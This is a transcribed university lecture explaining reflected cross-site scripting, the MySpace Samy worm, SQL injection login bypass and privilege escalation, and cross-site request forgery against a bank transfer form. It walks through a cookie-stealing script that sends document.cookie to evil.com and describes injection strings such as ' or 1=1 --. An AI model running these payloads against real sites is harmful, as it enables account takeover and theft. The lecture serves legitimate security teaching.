Hello class, welcome to the second lecture on the module of web security. So in the last class, we looked at some of the basics of the web ecosystem. So today we will delve into the details and we will talk about cross-site scripting, cross-site request forgery, SQL injection, and we will also talk about defenses against cross-site request forgery. So our starting point here is the JavaScript programming language, which, as I mentioned in the last lecture, is sent is created by the web server and sent together with the HTML content to the web browser. So the JavaScript code is actually executed on the client side within the web browser, and it provides a very dynamic look and feel to the web page. So, for example, it can run before the HTML is loaded. It can it can trigger before the web page is viewed, while the web page is viewed, or even when you choose to leave a web page, or when you click a mouse button and so on, or when you're hovering over text. In fact, there are studies that show that popular e-commerce websites include so much JavaScript on their web page that using this JavaScript, they actually track your mouse movement patterns over their web page, even as you're browsing products. And using this, they are able to get a good idea and intuition about the kind of products that you like. Just for example, based upon the amount of time that you spend hovering over a particular product that's displayed on the screen. So JavaScript is incredibly useful. In fact, it has often been called the assembly language of the web, and it is here to stay. Right? All web browsers use JavaScript. All web servers use JavaScript, and all web browsers support JavaScript. So it is also the vehicle for a large number of exploits. As we will see, the first and most important class of exploits that we will be considering are cross-site scripting exploits, where the attacker injects malicious JavaScript code into a web page or HTML, and when the script is executed, it's used to steal cookies. Right? As we saw in the last class, the most important resource that one would like to protect are cookies. Okay, so here's an example of JavaScript code. This is JavaScript code that is delivered from the web server onto the web browser. So you can see that the script tag is the one that is used to demarcate JavaScript that is sent to the browser. And as I was mentioning in the previous slide, JavaScript is a very event-driven language. So there are events that you can register to listen to, and these functions get triggered when the specific event happens in the browser. So in this particular case, you can see a function that is going to be triggered whenever there is a mouse button that is clicked, right? So what you see over here is the HTML code that's displayed on your on the web page, and the actual JavaScript is embedded within the script tags, and this stuff over here is appearing within the HTML content of whatever is displayed within the browser. So specifically the event that's going to get the function that's going to get triggered is this function called which button. That is going to be triggered on the on mouse down event. So these are standard events that are supported by the HTML standard, and on mouse down is an event that happens whenever a button is clicked in the mouse, right? So whenever an event of this sort happens, this is a device that's connected to your computer, and there is a process, in this case the browser, that's registered to listen to these events. The browser gets a notification whenever an interrupt of this sort happens. It converts that into an on mouse dot event, and it sends a notification to JavaScript on this web page saying that this event has happened. Now, if that web page has registered an event handler for this, which is in this case called which button, that function gets triggered. And over here, you can also see that the event specification, whatever the event is passed as an argument, and based on the event, every event has its own set of arguments. So on mouse dot events, you can check whether the button that was clicked is the left button or the right button by just looking at the corresponding field of this event structure. Right? These are all JavaScript data structures, and over here, based on that, you can actually say that the left mouse button was clicked or the right mouse button was clicked. All of these are JavaScript code, right? It's a full-fledged programming language, and over here you can see the alert statement that just pops up a box on your screen saying, you have clicked the left or the right mouse button. So this is how scripts are written. Of course, modern web pages have a tremendous amount of such scripts that are embedded inside. Um, so if you want to see a good example, go download the script recursively. You'll have to do this over and over for what is displayed if you open up a Google Maps web page. You'll find that there's there, there's a huge amount of code. Not all the code comes in one go, right? So some of the code is delivered using this construct in JavaScript called document.write, and more code is brought in. This is called Ajax technology. So one of the things that you will find in JavaScript is that there are certain constructs that the JavaScript code is allowed to refer to. One of these is the document uh, sort of keyword, and the document keyword is exported by the browser's document object model, or DOM. So the DOM is a tree structured representation of everything that you see on the web page, and the JavaScript itself is presented a programmatic view of what you see on the web page. So whenever you see this keyword called document, it's a reserved keyword in the JavaScript language. Uh, you can actually refer to various aspects of the web page that's currently under view. So you can say document.cookie, and it gives you all of the cookies associated with the current document. Okay, so you can actually manipulate cookies, you can inject new HTML code, you can actually do self-referencing using the this statement, and you can obtain the HTML code that is currently loaded on the web page and make changes to it dynamically as well. So this is why JavaScript is such a powerful language, because it lets you modify the web pages on the fly. Okay, so the JavaScript security model is that of the same origin policy. So all JavaScript runs in a sandbox, right? And for example, JavaScript does not even have any built-in constructs to access files or talk to the network. Well, there are some to talk to the network, um, but these are all going to execute under certain rules within the web browser. Okay. So what are these rules? We saw in the last class, the main security policy on the web is that of the same origin policy. And what the same origin policy states is that everything, all documents, all artifacts that are associated with a particular web page uh, are tagged with a triple, which is the server, the protocol, and the port that was used to deliver that content. Okay, and so whenever JavaScript that is trying to access, let's say, a cookie or any other artifact of that web page, this triple should match: the server, the protocol, the host name, which is the server name, and the port should all match. And if not, the content is not shared with the JavaScript code. So the same server hosts unrelated sites. The scripts from one site can in fact access document properties on the other. In other words, if you have a website called www.google.com/mail, it can also access, for example, the contents of another frame displayed within the same web browser with www.google.com/maps. Okay, that's allowed. And that is related to how the W3C standard refers to this notion of server, right? It's not the full path name, it's only the top level path name that's used to differentiate between the two different servers. Okay, the user can choose to bypass the same origin policy by granting special privileges to what are called signed scripts. So these are supposed to be scripts that you trust, and you can actually grant privileges to these scripts to um, access things that are beyond the same origin policy. Some browsers support this, and these are called universal browser read, universal file read, and universal send mail. But we are not going to be concerned with this. I'm just telling you that there are exceptions to the same origin policy. We are mostly only be going to be concerned with the implementation of the same origin policy and attacks that work within the constraints of the same origin policy. Okay, so what can happen if you have poorly written scripts? So let us look at the very first example of a very major attack that can happen via the JavaScript security model, and these are cross-site scripting attacks. Okay, so let us just consider that we have a web server. This web server is running an application called search.php. It's a search engine, and the web server is hosted at naive.com. Okay, so naive.com is our web server, and search.php is the search application. And the way that it works is that it asks for an input from the user, which the user provides through their web browser. And in this particular case, the input is provided, let's say, in this form. Okay, so the input over here is Sachin Tendulkar. Okay, so the end user would type this keyword on their browser, and it when they make an HTTP request, it goes to this naive.com, it invokes this application with this term. Now this is a web application. Okay, so the web application's job is to do something with the search term that's been provided. In this case, probably look for all web pages that contain that term and return back the query results to the user. Okay, so as I was explaining in the last lecture, the way that web applications work is that they produce HTML and JavaScript code and send it back over to the web browser, where the HTML and JavaScript code, cascading style sheets, XML, what have you, the content that's produced, the contents that generated by this web server are going to be sent back, the web application are going to be sent back um, to the web browser where they're going to be displayed. Okay, so the search.php application is going to now, in this case, come back with a set of search terms. And let's just assume that this search.php is written in such a way that it is just going to echo back the term that was sent as the search query together with the search results. Okay, so what I'm showing over here is a portion of what this search.php application would return. Right, it's creating HTML, and it's just saying, okay, look here at your search results, and you have searched for, okay, I'm just going to echo back. This is PHP syntax to just take whatever is provided as the input over here and echo it back on the web page. Okay, and obviously the search engine is going to have a set of results that it obtains via the search algorithm, and those are all going to be converted to HTML and then put within this body tag and sent back. Okay. Here is another example. That was PHP. This is CGI. Maybe you send a GET request to this web application that's running hello.cgi, and maybe it's a toy application that just reflects back the name of the user that has been submitted as the name. Okay. Now hello.cgi in this case is just responding with welcome dear Bob. Okay. So our starting point for studying cross-site scripting attacks are these kinds of web applications. Okay, web applications which are actually taking input from the user. And as I was describing in the last class, any input that is coming to a web application from over the internet is supposed to be considered untrusted input, because that input could have come from anywhere, right? So as far as the web application is concerned, everything that is coming from the outside is a untrusted input. So in this particular case, untrusted input is simply being echoed back to the same web application, is being echoed back by the same web application to the end user. Okay, so that's what this is. The input is being echoed out, is being sent, is being used to produce the output term, but pretty much without any sanitization, and therefore we will see what happens in just a second. Okay, so having set this up, let's look at how cross-site scripting works. So cross-site scripting is among the most dangerous classes of exploits as far as web security goes. For a while, and in fact, I believe even now, this is probably among the most serious vulnerabilities that there is in all sorts of top 10 lists. Before it used to be buffer overflows, now it's cross-site scripting. And our uh, it's actually a rather complicated attack to follow the first time you see it. And this is a problem with web applications in the sense that the core of the vulnerability here lies with the web application that is poorly sanitizing untrusted input provided to it and producing web pages with this untrusted input, just like in this example that we are seeing over here. So for the next slide, we'll just be using this as our example, just because it's simpler. Um, and the untrusted input over here is this thing over here that's provided by the end user. Okay, and the key is that it's used to provide the web page. It's used to generate the web page that is going to be displayed within the client's web browser. So let's see how it works. So there are three actors in this cross-site scripting, and this is the most basic form of cross-site scripting. There are many, many more complicated variants. I am only going to present, and we are only going to be studying the simplest version of it. At the end of it, at the end of it all, it's the same kind of vulnerability that is repeated over and over in all variants of these cross-site scripting attacks. The only difference between various variants is that uh, is the complexity of the attack, but the core vulnerability remains the same. Okay, so we are going to have three actors in our cross-site scripting attack. The first, of course, is the vulnerable web server, naive.com, which is running this web application, hello.cgi, that contains the vulnerability. Okay, so what is the vulnerability? As I was explaining in the previous slide, the vulnerability is that it is just going to take untrusted input that is provided to it from people that are visiting that application and giving input to that application, and just using that to produce a web page. Okay, so that's naive.com. The second actor is the victim, which is you sitting in front of your web browser uh, and trying to invoke this hello.cgi with various arguments. The third actor is the attacker, okay, evil.com, which is another website on the internet. Okay, now what is the goal of this attack over here? Well, the victim, which is you, let's say you have some credentials with naive.com. Okay, maybe this is a login password or something like that, at the end of which so it doesn't matter what the credentials are. The point is that naive.com, you're authenticating yourself to naive.com, and naive.com is going to give you back a cookie. Okay, so you have a cookie with naive.com that is going to present to naive.com your authentication credential. So if you present that cookie to naive.com, naive.com will know that it's you. So therefore, if that somebody else presents that cookie, that other person will be able to convince naive.com that it is in fact you, and therefore naive.com is now going to give content that was otherwise meant for you, probably email content or whatever it is. Okay, so the goal of this attack will be for the evil.com, the attacker, to steal your cookies with naive.com. Remember, your cookies with naive.com are stored in your browser. Okay, and evil.com's goal is to try to get its hands on that cookie. Now, this is far from trivial if you don't have a cross-site scripting vulnerability, and the reason is because whenever you on the which is the victim, even if you visit evil.com and evil.com were to send you any sort of scripts, those scripts and the content that is sent to your browser from evil.com cannot access your cookies with naive.com. Why is that? Well, the reason is because of the same origin policy, right? The the users cookies with naive.com are going to be tagged with naive.com, the corresponding protocol as well as the port. And as you can see over here, even the server name does not match. Therefore, any content that is sent from evil.com will automatically be disallowed by the victim's browser from accessing the victim's cookies with naive.com. Okay, so it's not a straightforward thing for evil.com to steal the victim's cookies with naive.com. That's where the cross-site scripting attack is going to play a role. Okay, so let's see how it works. So the victim, the first step, of course, is the victim sometime in the past has authenticated themselves to naive.com, and naive.com has sent a cookie, and the cookie is stored in the victim's browser. That's the first step of the attack, because that is the thing that the evil.com server is going to steal. Okay, so let us then assume that the victim at some later point in time, they are going to access some web page that leads them to evil.com. Maybe evil.com is an evil website and the victim does not actually intentionally visit evil.com. Maybe they went and accidentally clicked a link that makes their browser display a page from evil.com. Now, how can this happen? Well, this can happen through all sorts of social engineering means, right? I mean, maybe you get an email with some sort of uh, a text saying, click here to win a prize or something like that. And when you click there, the hyperlink that's embedded underneath that text is in fact evil.com. And we all get tricked into clicking a link. In fact, we don't even think about it. But the idea is that the victim's browser, the victim is somehow tricked into visiting this evil.com. You do not have to type www.evil.com explicitly into your browser. You're tricked into doing so by just clicking some email link or something like that. Okay. Now what happens is that evil.com is actually going to send back, because you have accessed or you've been tricked into accessing evil.com, right? So now evil.com is a web server. Evil.com is going to send back some content for you to display on your web browser, right? Now, this is what I was saying, right? I mean, you don't access it actively. It might be a URL that's embedded in some HTML email. So now evil.com is going to send back to your browser some HTML content. At the end of the day, it's a web server. It can send back content. So what is the content it's sending? Well, so here's an iframe, and it's going to be sourced at naive.com/hello.cgi. Now, anybody can send you a frame that is sourced at some other third URL. So evil.com is creating a frame over here that's sourced at naive.com. Now, in creating such a frame, whatever is inside this frame can only uh, go and access naive.com's cookies, but or naive.com's content, but it cannot communicate with evil.com. So it's safe, right? Anybody can create such a frame. And this is what happens in mashup web pages, right? A news website will actually create a frame with the source being the advertiser's website, right? That's how they're able to prevent the advertiser from accessing their content. But the stuff that is tricky over here is that it's evil.com is going to call naive.com's hello.cgi application, and it's going to call it with an argument that is supposed to be a name. But as you can see over here, the previous slide, you'll see that it's supposed to be a name, a string, right? That's displayed back in the HTML code that's generated by the naive.com. But in this particular case, what the evil.com decides to do is that evil.com decides to actually send something over here that starts with the script tag and ends with the script tag. And there is some code over here. We will see what this code is in just a second, but it's some stuff over here with that is passed as the argument to name. Now, what does the victim's browser do? Well, the victim's browser tries to render this code over here, the HTML code. And in doing so, it sees that, okay, there is a frame that is sourced at this naive.com. So I must send an HTTP GET request to this naive.com. Okay. So that's exactly what it does. So it sends an HTML GET request over to hello.cgi. And hello.cgi is just a CGI application. It is going to be invoked with this stuff shown in red as the argument to name, the name parameter of hello.cgi. So now what does hello.cgi do? Well, what does hello.cgi actually do? If you see the previous web page, right, it's going to create some content like this: HTML, welcome, dear, whatever is provided over here, close HTML. Okay, so that is exactly what hello.cgi is going to respond with, right? It executes, it generates HTML content. What's the HTML content? Exactly what I told you. Within the HTML tags, hello dear, and whatever is shown as the argument is passed as the argument to name. It should be Bob, but in this case, it's a script. So hello dear, and then it says here's the script tag, and then this stuff shown in red. Exactly, I've just copy pasted. Okay, and that is created by naive.com and sent to the victim's browser. So now when the victim's browser actually sees this stuff, this is HTML code. It's going to try to render that. It's going to show this stuff. And in showing that, it sees, oh, there's a script tag over here. Let me just execute the stuff over here because JavaScript code. Remember, this stuff shown in red actually originated from the attacker. But now what is happening? Well, this stuff that was sent by the attacker was reflected back from naive.com to the victim's web browser. So evil.com sent it. The victim's browser just relayed it to naive.com. Naive.com reflected it back to the web browser. And the point is that this script over here is now going to execute within which iframe? It's going to execute within the iframe that is sourced at naive.com, and therefore the same origin policy allows whatever is being displayed within this stuff over here to access everything that naive.com's iframe has access to, which also includes this cookie. Okay, so now let's see what this code in red over here does. The code in red over here is just going to say win.open http://evil.com /steal.cgi cookie equal to something. Okay, so this document.cookie is actually, as I said a couple of minutes earlier, document.cookie is a keyword that you can use within JavaScript code that refers to the cookie of the current iframe or the current website. Uh, and so whatever is accessible within the constraints of the same origin policy are going to be returned by this document.cookie. So that means that this document.cookie over here is going to be able to access this cookie that is part of the same iframe within which this code is being displayed. What is that iframe? The iframe sourced at naive.com. Therefore, naive.com's cookie is going to be available to this code. So what is this code doing? It is actually opening up a pop-up window, win.open, and it's going to open up a pop-up window that is sourced, that is going to now fetch some content from evil.com. So it's going to send an HTTP GET request, and it's going to invoke an application called steal.cgi. It doesn't even matter if that application exists over here or not. And it's going to pass as arguments whatever it gets as the cookie from here. So when this victim's browser displays this code over here, it opens up a window and it sends an HTTP GET request to this evil.com asking to invoke this application called steal.cgi, and it's actually sent the contents of the cookies to evil.com. Now at this point, the attack is complete, right? It doesn't even matter if a steal.cgi application exists over here or not. The cookie itself has been embedded in this GET request and has been sent over to evil.com. So mission accomplished. Okay, so a couple of things over here, right? So it's called a reflected attack because the attacker is sending content that is passing through the browser, getting reflected back by naive.com, and then sending the cookie over to evil.com. Now there are variants of cross-site scripting called stored cross-site scripting, where this script is not going to be reflected back, but rather stored somewhere locally on this victim's local machine, and the victim's browser does pretty much the same thing. Okay, those are other variants, right? I'm showing the reflected version, which is probably the earliest one, the earliest variant of this to be discovered, and also probably the one that is easiest to explain because in some sense you can see all the actors, all the steps of this attack. Okay, so where is the vulnerability? I mean, the attack has happened, but where is the vulnerability? The vulnerability lies in hello.cgi. And the vulnerability lies in the fact that the script tag over here was actually, uh, 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 you did not check for the script tag, and you just took whatever is provided as the argument and then sent back. Now, I challenge you to do some experiments, right? I mean, in some sense, if you think about Facebook.com is actually taking untrusted inputs all the time. The Facebook.com application is going to take whatever you type in your browser and then create a wall message out of it and then display it back to your web browser. Okay, so it is sending back content uh, that you gave. So I challenge you, go type this stuff over here, script win open or something like that. Type executable JavaScript code into the Facebook wall status message and see what you get. Is it actually going to display it as executable code or not? Just go try it, right? I'm sure your friends are going to complain about your wall containing totally random code like messages, but then you can explain to them that you're taking this course and you're trying an experiment. Okay, you will find that they will actually take the stuff over here and it's not interpreted as code. Right? Uh, they actually just interpret it as ASCII. Okay, and the fundamental problem over here lies in the fact that naive.com sends back HTML and treats this stuff over here as code and sends it back. Okay, so that's what makes the victim's browser actually execute this as code. Uh, so, and that leads to the attack. All right. Okay, so in this particular case, as I said, the cross-site scripting is a form of a reflection attack. The user is tricked into visiting a badly written website, which is um, uh, tricked, or the user actually has business there, which is naive.com. This bug in the website causes it to display the attack script, and the user's browser simply executes arbitrary operations that are contained in the attack script. Okay, and you are able to transmit in this particular case the user's private data, which is the cookie, over to the attacker. Okay, so you can do other kinds of things, right? You can change the contents of whatever the affected website is, naive.com. You can show wrong information, and you can also cause the browser to attack other websites. So cross-site scripting is a very, very powerful attack. We have only looked at the simplest version of it. Just like, with buffer overflows, we only looked at stack-based buffer overflows. We didn't look at things that were more complicated than that. So that's cross-site scripting. So cross-site scripting was actually very, very popular. In fact, it was used as it was the vehicle for the Myspace worm. So many of you may not be familiar with Myspace, but Myspace is the precursor to Facebook. It was a very, very popular social networking website in the mid 2000s. And what happened was that there was a worm, a very fast spreading worm that was written on Myspace that took advantage of a cross-site scripting vulnerability in the Myspace uh, web server. Okay, and the person who actually wrote this worm, they have written an article over here. You can go and take a look. Uh, uh, who the attacker was, your guess is as good as mine. This is a website over here where all of the details are presented. So the key thing about the Myspace worm is that it is the fastest recorded uh, worm spread in history. Okay, so what did the worm do? Well, it didn't do anything bad or malicious, but here's what he did. It did. Okay, so this Myspace, as I told you, is a social networking website, and there was this user called Sammy on Myspace. For some reason, they felt that they did not have very many friends. So what they thought was, and they found this cross-site scripting vulnerability. What they thought was they're going to write a script so that anybody and post it on their own web page, so that anybody who visits that web page, Sammy's web page, this code that they wrote, this JavaScript code that they wrote, would then be uh, also displayed on the person visiting Sammy's wall. Obviously, if you go visit Sammy's wall, that code that is there is also going to get displayed. Now, because of the cross-site scripting vulnerability, that is going to execute as code in your browser, and the net effect of that code is to make you friends with Sammy. Okay, you might not be that person's friend, but just the fact that you visited the wall is going to make you their friend. Okay, and worse still, it is going to copy that same friend-making code onto your own wall. Okay, so that now anybody who visits your web page is also going to execute that script and also becomes friends with Sammy, and recursively, right? So now anybody who visited Sammy's web page becomes friends with Sammy and get infected. And now anybody who visits that person's web page get infected and becomes friends with Sammy, and so on. Okay. And very soon this user Sammy had 1 million friends, and this was within a matter of a few hours. So this was the fastest recorded worm spread in history at that point. um, okay, and here's how it worked, right? So users on MySpace were allowed to post HTML on their MySpace pages, okay, like in a wall, but instead of just posting plain text messages, you could post HTML on the equivalent of the wall on MySpace. And the reason was, HTML really allowed you to create pretty web pages. Okay. So one of the things that MySpace did was that they were aware of cross-site scripting. So they did not allow, dangerous tags to be included in the HTML. So for example, they knew about cross-site scripting, so they would disallow script, or they would disallow body, they would disallow on-click, which you can use to register JavaScript handlers, or they, Ahref JavaScript colon colon. All of these are different ways by which you can register JavaScript. So they knew about it and they filtered it out. So if you had any one of these things in your HTML code, then it would not actually find its way to the wall, and they would filter it out. Okay, but it did allow for div tags in cascading style sheets. Okay, and the attacker saw an opportunity here. Okay, so it did allow for things like div style, background URL, JavaScript alert. Problem, of course, is that if you put something like this JavaScript over here is going to say that, okay, what is following this stuff over here is JavaScript, and it is now going to filter that out. Okay, so MySpace is very clever. The MySpace web server is very clever. Its filtering strategy strips this out. But here's the problem. Okay, the problem was, in those days, the Internet Explorer web browser. Okay, the Internet Explorer web browser, if you gave Java followed by a new line followed by script, the Internet Explorer web browser on the client side would just treat that as ordinary JavaScript, and anything following that would be treated as JavaScript within the Internet Explorer web browser. Okay, so as far as the web browser was concerned, JavaScript in all in one word or Java new line script were the same thing, and anything that followed it was valid JavaScript. But as far as the MySpace web server was concerned, their filter did not include a rule for this Java new line script. So this was a mismatch in the semantics of JavaScript between MySpace's web server and the Internet Explorer browser. Okay, so that's exactly what the attacker took advantage of. They took Java new line, the sort of \n equivalent script, and they sent it over by putting it in the div tag. The MySpace server accepted it, and it was displayed on all browsers, of course, but only the Internet Explorer browser would treat it as executable JavaScript code and then actually execute it within the client side. Remember, cross-site scripting requires the client to execute the code. There are other problems, like, there are quotes over here, right? Single quotes. So it turns out MySpace will also strip out quotes, but there's a trick for that too, right? I mean, instead of actually providing the quote, you provide the ASCII equivalent, and then you convert from decimal, right? You provide the decimal equivalent for whatever the encoding for the quote is, and then the browser converts it for you. And essentially, there were a few other complications that were that the uh, author had to overcome, mainly to get around the rules and the checking of MySpace. But uh, as you can see, if you go over here to this website, you will see the full account of all of the technical difficulties. But it was pretty much straightforward cross-site scripting hack with all of these caveats, of course. Right? So it started, as I said, with Sammy on MySpace. And everybody who visited the infected web page themselves became infected and would add Sammy as a friend. And 5 hours later, Sammy had over 1 million friends and was adding 1,000 friends per second as its peak. Right? So the worm was spreading by infecting 1,000 people per second during the peak infection stage. Of course, they shut it down, but the damage was done. Right? So that's the MySpace worm. It's a very very famous instance of cross-site scripting. Okay, so where do these malicious scripts come from? Well, they come in user created content, and uh, some it's difficult to sort of filter out bad content by writing rules. As you can see, right, MySpace nearly got it right, but then they missed this one corner case for Internet Explorer, and it led to the whole MySpace Sammy worm. Okay, you can also store these malicious scripts over here, right? Like this is a reflection trick. So what happens is that the cnn.com URL, then you pass the script over here like this. Okay, um, and this is also, you're parsing the input from the URL, and if you're using the input over here, the input is now terminated. You put these two, and then now this is going to be uh, executed as a script by CNN. Okay. um, Likewise, if you send a phishing email and you hide your email content, the URL content in that, in the whatever is sent in the rich text HTML format, user will never see the URL, right, and end up clicking it. Okay, so scripts are embedded in web pages, and as you saw, everything that we talked about this attack happens within the constraints of the same origin policy, uh, and so that's the problem, right? So how do we prevent cross-site scripting? Well, we are going to have a full lecture on it. Next lecture, we are going to read a paper about it. But the basic idea is that, just writing simple rules is not enough. You can't just block things like, the greater than, less than, or even the JavaScript tag, because there are so many places from which inputs can come, and you can encode the JavaScript using various encodings that are equivalent to the browser, and unless your rules are going to consider all of these various ways of uh, uh, variants in which this code is expressed, you're going to now have a problem. So the best solution, of course, is not to deal with these kinds of inputs, uh, but rather clean up the web server code itself and ensure that the web server is going to treat untrusted input properly. So any user input, typically what we say, the currently accepted solution is to use something called prepared statements. So the user input must be pre-processed before it's used inside HTML. And most web development languages these days do have some notion of prepared statements. So in PHP, for example, you've got this thing called HTML special chars of whatever string is there. It's going to replace all the special HTML characters with their HTML codes. So it is the responsibility of this guy over here to present the string, untrusted string that's provided by the user in some standard format. Uh, for example, you provided this ASCII notation, it's provided with this quote, and this becomes amp, and so on. And now your rules can be written, these filtering rules can be written just for this standard format. You don't have to think about all possible corner cases. Same thing in ASP.NET, which is a Microsoft supported web server, web application development language. You can encode a string like this with server.html encode. These are all called prepared statements. Okay. So that is the way that one can prevent cross-site scripting. Uh, Although in the next lecture you'll see that there are lots of trade-offs. You might not always want to modify the web server. What do you do in that case? You might have to work with legacy web browsers. What to do in that case? So we will talk about another solution. In this, in particular, we'll talk about a solution called Blueprint from around 10 years ago that presented a very novel solution to this problem. Okay, so now that we have studied cross-site scripting, let us now look at another class of exploits in the web server domain, which is that of exploiting back-end databases. Okay, so whenever web applications, as you remember from last class, interact um, uh, with databases, the web application passes SQL queries over to the database, which the database then executes and then sends back answers to, right? Query results to. So in this particular case, the what is happening is that the user data is being so you have over here some HTML that is accepting, let's say, a form inputs from a form field. So maybe you have a login page in which you accept the login name and user and password, and this web application is now going to check your credentials against a backend database. So the web application itself is likely to contain code of this sort where they take the username directly from the web form and the password from the web form and create an SQL query that is now going to be sent to the backend database where it's going to be executed. Okay. So in this case, they're saying, okay, select star from the user table, which is the name of the table that the end user that's stored in the database, and the username is obtained from the web page. Okay, where username is within quotes, whatever this is, and the password is something that's obtained from the web page within these quotes. Okay, so the username, so the user is supposed to supply their username and password. And the SQL query is going to check whether the password username password combination is there in the database, and if not, further action is disallowed and the user is prevented from doing anything else on that web page. Okay, that's the idea over here. Of course, if the username and password match, then the user is allowed to do whatever this web application is doing with the credentials of that user. So the key over here, again, as with cross-site scripting, is that the SQL query is being generated directly from the user provided input from the form field, where the username is taken from this form and the password is also taken from the form and directly used to create this SQL query. Okay, so how can the attacker exploit this? Well, in SQL, the command for a comment is minus minus. Anything you provide after minus minus is going to be ignored. That is how you express comments in the SQL language. So instead of providing, let's say, username and password, supposing the user provided, this thing over here. So they provide an end quote or 1 equal to 1 minus minus. Okay. So then what happens, supposing this was provided as a username? So if that was provided as a username, that's exactly what is going to be passed as the argument in this light green thing over here. And this is what is going to happen. Okay. Select star from user table where username is equal to, look at this, open quote. The generated HTML query will contain this close quote or 1 equal to 1 minus minus. And because this minus minus represents a comment, everything else after this, which includes this and password and whatever is provided as a password and close quote, everything is going to be ignored. So if you execute this query, the database looks at this query, it is select star from user table where username is blank or 1 equal to 1. Okay. So either this predicate or this predicate has to be true. And if that is the case, then this whole thing is going to be evaluated to true, which is therefore going to trivially evaluate to true for every row in this database. So select star from user table is the result of this query, which as a result is going to uh, return back the contents of the entire database. Okay. Uh, and as you can see, user found is just going to execute the query, and if it is a non-null result, that is going to be true, right? And then the application is going to execute everything that is allowed. So user found.eof is false, the authentication result is always correct, and then the application proceeds to execute. Now, this is the simplest version of the SQL query. You can also do more complicated things. You can uh, just a second. There is some complication over here. Let me just correct the slides because there is some overlapping HTML content that I don't want to. Okay. Oops. Okay. Okay. So I hope this is okay. Um, Sorry about that. That's a rendering problem. Okay. So you can also set this thing over here with bad PWD and all of these ASCII characters. And what you'll find is that this SQL query ends up becoming something like this, where user update, and now it's an actually update query, not a select query. Update with user password MD5 equal to bad password, and user level is equal to 103. This super level, super user privileges, and user's password is set to the bad password. Okay, the user ID is user ID. This will also execute and end up executing with super user privileges, assuming that there's a user who has already been, you have been able to change this bad password in the past, the user's name to bad password. Okay, so this is an example again of a SQL injection attack. And this is just, there are many ways in which um, this is the simplest variant. There are more complicated variants where you can actually erase the whole database. You can create a new user entry by creating a new row in the database. All of these things are possible. Okay, so that's SQL injection. And again, the problem here is that of unsanitized user input being directly taken from these web pages. And again, the standard solution these days to SQL injection attacks are prepared statements, right? You disallow things like this, and you assume that the SQL query that can be formed over here can only fit a particular template, and if not, you reject the SQL query. So prepared statements are the answer to SQL injection attacks nowadays. All right. So now let's move on to the third class of attacks, which is cross-site request forgery. Um, so of course, let's assume that, like in the case of Google, where your cookies are persistent in the sense that you log in, but the cookie just, even if you navigate away from the web page, the cookie is still active. Let's assume that, you have a bank that also does the same. The user logs into the bank and forgets to sign off. You don't actually click the sign off button, so the cookie remains active. This is exactly how your Gmail cookie works today. Okay, and let's just assume that this user is tricked into visiting a malicious website, okay, containing this HTML code over here. So there is a form. It's a HTML form, and it says the name is bill pay form, but the action is hidden, right? This is not actually shown to the web browser, to the end user, but it's there. It's there, the HTML code that's embedded in the web page. And it says httpbank.com/billpay.php, and the arguments to this billpay.php maybe is the PHP application hosted at the bank, where you can specify the name of the recipient and also the value that you want to pay someone, and it's a quick money transfer, right? Many banks have these things Of course, there's OTP and all that, but I'm ignoring that here. Let's assume there's no two-factor authentication. So the name is there, then you can specify the name as the recipient, and then you can specify the value over here. Maybe it's 100 rupees or something like that. And it's there, it's displayed on your web page. So what happens is that when this web page, when this stuff over here is displayed on your web browser, this code over here is sourced at bank.com, and whatever this code over here, the script over here is there, uh, that is now going to be displayed, is going to be running with bank.com's privileges, therefore can run on your web browser within that iframe, and can therefore fetch all of the cookies corresponding to bank.com. And therefore bank.com's cookies are going to be sent together with this request over to the bank, which then thinks, okay, yeah, you are authenticated with the bank, you are asking to transfer whatever money to this recipient, and it's simply going to go ahead and complete the request on your behalf. Okay. So most banks prevent this nowadays, of course, by just expiring cookies immediately. They don't even allow the cookie to remain active after you have navigated from the web page. But that's just that's not the solution to this problem. The solution to this problem is that over here, the the uh, the browser itself has the cookie that you endowed with it, that you gave the browser. The browser has your cookie, and it ends up giving that cookie whenever you visit the malicious website, and it ends up presenting that cookie over here. Okay. So what happens is that the data is actually sent over to the bad guy. So let me just look at some more examples. So here is one more, right? So here is a form that is the form says, okay, the action is open an iframe that is hidden, that's sourced at b.com, and send this value over here with hello. Okay, another way is you create an image tag, and then you send data equal to hello. So no user involvement is required. You just open the web page, this data hello goes to b.com. Okay. And it's going to go with all of the cookies that you have with b.com that are stored on your browser. Okay. So the classic cross-site scripting or cross-site request forgery attack, the classic cross-site request forgery attack is a summary of just what I told you right now. The user visits the victim site. Okay, this is the victim site. You log in. A.com is your victim site, and you have stored the cookies of A.com in your browser. And the user is somehow tricked into loading the attacker's site. Um, and the attacker just sends HTTP requests to the victim, and the victim is just assuming that the requests are originating from itself, right? I mean, the user actively clicked the link and then made the thing happen. Like in that bill pay application, the bank is fooled into thinking that the user himself clicked the bill pay application and then asked for the money transfer to happen, whereas in fact it's happening from b.com. In fact, one of the exercises that I will leave you with before I talk about cross-site request forgery defenses in the first half of the next lecture is that I'm going to leave you with, I'm going to tell you the answer, but I'm going to have to ask you to come up with the explanation. I claim that the cross-site request forgery attack is in fact a confused deputy attack. Okay, it's a confused deputy attack where the web browser is the confused deputy and ends up sending some access rights that it has over to, it ends up using the access rights or restricted to using the access rights when it should not. Okay. So, in fact, it's a confused deputy problem, and I want you to think about it. Uh, and I also want you to think back to that lecture and then tell me what the solution is. And next class, we will map the solution to that particular concept. Okay. So here is the classic Csrf attack in terms of the same picture that I drew for cross-site scripting. So we have got three actors: bank.com, the victim's browser, and the attacker. The goal is for the attacker to accomplish something on bank.com with the victim's credentials. Okay, for example, transfer money to the attacker from the victim's bank account. Okay, so the victim has somehow logged into bank.com and has saved their cookies over here. The victim is tricked into visiting the attacker's web page, who then sends this thing over here, uh, this hidden content, bank.com/transfer. Transfer is the application, right? And the recipient over here is the name is the recipient, value is the attacker, the amount is $100 that's going to be submitted, and when this is going to be displayed on the victim's browser. It could even be like a very small iframe that's not visually visible to the victim, and that iframe will end up just sending a request to the bank server together with the session ID and the cookies that are currently active, right? And the bank simply fulfills the request saying, okay, done. So now the actual money transfer to the attacker happened within the bank server from the victim's bank account. So that's a classic cross-site scripting attack, cross-site request forgery attack. And so the problem here is that the user's credentials, which is this cookie, were automatically attached by the victim's browser along with this request that was sent. So that's the core of the cross-site request forgery attack. Okay, so we are going to stop here for today, right? Next class, I will start with the next slide where I talk about the defenses for cross-site request forgery. And then I will also tell you about a defense for cross-site scripting. That's the blueprint paper. So we will leave the defenses for the next lecture. Today, we have just spoken about attacks, the three kinds of attacks: cross-site scripting, SQL injection, and cross-site request forgery. So please sort of review this lecture multiple times. Some of these attacks are hard to understand the first time you view them. Uh, Make sure 